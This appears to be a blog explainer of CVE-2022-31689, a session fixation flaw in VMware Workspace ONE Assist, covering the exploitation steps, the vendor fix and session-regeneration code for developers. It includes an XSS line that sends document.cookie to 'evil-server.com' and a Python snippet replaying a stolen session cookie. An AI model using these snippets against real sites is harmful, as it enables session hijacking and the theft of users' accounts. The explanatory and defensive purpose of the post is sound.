*Posted June 2024*


Summary:  
CVE-2022-31689 is a session fixation vulnerability in VMware Workspace ONE Assist (before version 22.10). This weakness lets attackers hijack user sessions by reusing valid session tokens. If an attacker gets a session token (maybe via phishing or malware), they can use it to access the application as if they were the actual user.

What is Session Fixation?

Session fixation happens when an attacker tricks a user or system into using a known session identifier (session_id). Since the session token is valid and known to the attacker, they can impersonate the user.

Where Does the Problem Occur?

Workspace ONE Assist used session tokens to validate users. These tokens weren’t always invalidated or recreated upon login. If an attacker managed to get a hold of a session token, they could use it to log in, even after the original user finished logging in.

VMware Advisory:  
VMware CVE-2022-31689 Advisory

Let’s walk through a simple exploitation scenario in plain steps:

1. Steal a Token: Attacker gets a user’s session token, maybe from browser cookies, XSS, or phishing.
2. Access the Application: The attacker sends requests to Workspace ONE Assist using the stolen token.
3. Act as the User: Since the token is already valid, the attacker gets user access without needing the password.

Example code: Stealing and Using the Session Token

Assume the session token is passed as a cookie named ASSIST_SESSIONID.

A malicious script could look like this (for XSS):

```javascript
// Malicious JS injected via XSS
fetch('https://evil-server.com/steal?cookie=' + document.cookie);
```


This sends all cookies, including ASSIST_SESSIONID, to the attacker.

```python
import requests

# The stolen session cookie
cookies = {'ASSIST_SESSIONID': 'stolen-session-token'}

# Replay the cookie against the application (step 2 above)
response = requests.get('https://victim-workspace-one-assist.com/user/dashboard', cookies=cookies)

print(response.text)
```

Just like that, the attacker accesses the victim’s dashboard.

Why Does Session Fixation Work Here?

The vulnerability is that session tokens stay valid after login, and Workspace ONE Assist didn’t always generate a new session token after authentication. This allows session reuse by an attacker. Ideally, after login, the application should generate a new session token, invalidating any previous one.

Exploit Considerations

- This attack requires *obtaining* a valid user’s session token, which typically needs another vulnerability (XSS, Man-in-the-Middle, malware, etc.).
- After getting the token, the attacker needs to access the application before the victim logs out or the token expires.

Mitigation and Fix

VMware’s fix:  
Upgrade to Workspace ONE Assist version 22.10 or newer.  
This ensures new session tokens are generated after login, and old sessions become invalid.

Fixes for developers

- Regenerate session IDs on every login/authentication event.
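
One way to implement the regeneration rule above, shown as an added Python example that is not VMware's code or part of the original post. `SessionStore`, its method names and the in-memory dict are hypothetical; the in-place login models the weak pattern described earlier, next to the corrected one.

```python
import secrets


class SessionStore:
    """In-memory session table: session id -> data (hypothetical model)."""

    def __init__(self):
        self._sessions = {}

    def create(self):
        """Issue an anonymous (pre-login) session id."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        """Return the authenticated user bound to sid, or None."""
        return self._sessions.get(sid, {}).get("user")

    def login_in_place(self, sid, user):
        """Weak pattern: authenticate the existing id, which never changes."""
        self._sessions[sid]["user"] = user
        return sid

    def login_regenerating(self, sid, user):
        """Hardened pattern: drop the old id, bind the user to a fresh one."""
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user}
        return new_sid

    def logout(self, sid):
        """Invalidate the session on the server, not only in the browser."""
        self._sessions.pop(sid, None)


def pre_login_id_survives(login):
    """True if an id issued before login maps to the user after login."""
    store = SessionStore()
    known_sid = store.create()          # id that existed before authentication
    login(store, known_sid, "alice")    # "alice" is a constructed user name
    return store.user_for(known_sid) == "alice"


if __name__ == "__main__":
    print("in-place login:", pre_login_id_survives(SessionStore.login_in_place))
    print("regenerating login:", pre_login_id_survives(SessionStore.login_regenerating))
```

A regression test built on `pre_login_id_survives` is a cheap way to keep the regeneration behaviour from being lost in later refactoring.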

Key References

- VMware Security Advisory: VMSA-2022-0025
- OWASP Session Fixation Cheat Sheet
- VMware Workspace ONE Assist Documentation: Official Docs

Final Thoughts

CVE-2022-31689 is an important reminder: session management must always renew tokens on login and invalidate old ones. Even top enterprise tools can have simple, yet dangerous bugs. Update your systems, review your session management, and don't let attackers ride on stale tokens!

If you’re running Workspace ONE Assist below 22.10, update now. Stay vigilant!

Timeline

Published on: 11/09/2022 21:15:00 UTC
Last modified on: 11/10/2022 19:53:00 UTC